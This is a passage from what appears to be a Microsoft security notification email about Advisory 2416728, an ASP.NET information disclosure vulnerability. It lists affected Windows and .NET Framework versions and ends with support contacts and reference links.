Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Vista

Windows Vista Service Pack 1

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Vista Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Vista x64 Edition Service Pack 1

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Vista x64 Edition Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2008

Windows Server 2008 for 32-bit Systems

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2008 for x64-based Systems

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2008 for Itanium-based Systems

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2008 for Itanium-based Systems Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows 7

Windows 7 for 32-bit Systems

Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.0

Windows 7 for x64-based Systems

Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.0

Windows Server 2008 R2

Windows Server 2008 R2 for x64-based Systems

Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.0

Windows Server 2008 R2 for Itanium-based systems

Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.0

Recommendations

Review Microsoft Security Advisory 2416728 for an overview of the issue, details on affected components, mitigating factors, workarounds, suggested actions, frequently asked questions (FAQs), and links to additional resources.

Customers who believe they are affected can contact Customer Service and Support (CSS) in North America for help with security update issues or viruses at no charge using the PC Safety line (866) PCSAFETY. International customers can contact Customer Service and Support by using any method found at http://www.microsoft.com/protect/worldwide/default.mspx.

Additional Resources

· Microsoft Advisory 2416728  – Vulnerability in ASP.NET Could Allow Information Disclosure: http://www.microsoft.com/technet/security/advisory/2416728.mspx

· Microsoft Security Response Center (MSRC) Blog: http://blogs.technet.com/b/msrc/archive/2010/09/17/security-advisory-2416728-released.aspx

· Microsoft Security Research & Defense (SRD) Blog: http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx

· Microsoft Malware Protection Center (MMPC) Blog: http://blogs.technet.com/mmpc/

Regarding Information Consistency

We strive to provide you with accurate information in static (this mail) and dynamic (web-based) content. Microsoft’s security content posted to the Web is occasionally updated to reflect late-breaking information. If this results in an inconsistency between the information here and the information in Microsoft’s web-based security content, the information in Microsoft’s web-based security content is authoritative.

Thank you,

Microsoft CSS Security Team